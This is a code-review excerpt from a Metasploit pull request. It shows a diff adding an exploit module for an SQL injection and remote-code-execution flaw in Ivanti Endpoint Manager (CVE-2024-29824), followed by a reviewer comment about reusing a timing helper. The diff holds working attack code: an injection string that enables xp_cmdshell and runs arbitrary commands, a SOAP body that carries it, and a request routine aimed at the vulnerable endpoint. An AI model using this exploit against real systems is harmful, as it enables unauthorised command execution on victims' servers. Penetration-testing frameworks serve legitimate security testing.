modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb

```diff
@@ -0,0 +1,125 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'James Horseman', # original PoC, analysis
+          'Christophe De La Fuente' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://forums.ivanti.com/s/article/Security-Advisory-May-2024'],
+          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-24-507'],
+          [ 'URL', 'https://github.com/horizon3ai/CVE-2024-29824'],
+          [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/'],
+          [ 'CVE', '2024-29824']
+        ],
+        'Platform' => ['windows'],
+        'Privileged' => true,
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-05-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          # MS SQL logs will contain evidence of `xp_cmdshell` being used
+          # Fetch payload cannot be deleted while a Meterpreter session is active
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI of the EPM Web Services', '/']),
+        OptInt.new('DELAY', [ true, 'The delay to detect if the target is vulnerable using time-based SQLi in second', 5])
+      ]
+    )
+  end
+
+  def sqli_payload(cmd)
+    "';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '#{cmd.encode(xml: :text)}'--"
+  end
+
+  def xml_payload(sqli)
+    <<~XML
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
+        <soap12:Body>
+          <UpdateStatusEvents xmlns="http://tempuri.org/">
+            <deviceID>string</deviceID>
+            <actions>
+              <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
+                <status>GoodApp=1|md5=#{sqli}</status>
+              </Action>
+            </actions>
+          </UpdateStatusEvents>
+        </soap12:Body>
+      </soap12:Envelope>
+    XML
+  end
+
+  def soap_request(sqli, timeout = 20)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'WSStatusEvents', 'EventHandler.asmx'),
+      'method' => 'POST',
+      'ctype' => 'application/soap+xml; charset="utf-8"',
+      'data' => xml_payload(sqli)
+    }, timeout)
+
+    raise IvantiEpmRequestError, 'Failed to send the SOAP request' unless res
+
+    res
+  end
+
+  def elapsed_time(&block)
```

Comment:
Can we use the existing stopwatch helper here? 👀 

https://github.com/rapid7/metasploit-framework/blob/db94ad16d6d0325d288b6fe6ae2d63af0168c779/lib/rex/proto/thrift/client.rb#L1

https://github.com/rapid7/metasploit-framework/blob/db94ad16d6d0325d288b6fe6ae2d63af0168c779/lib/rex/proto/thrift/client.rb#L78-L80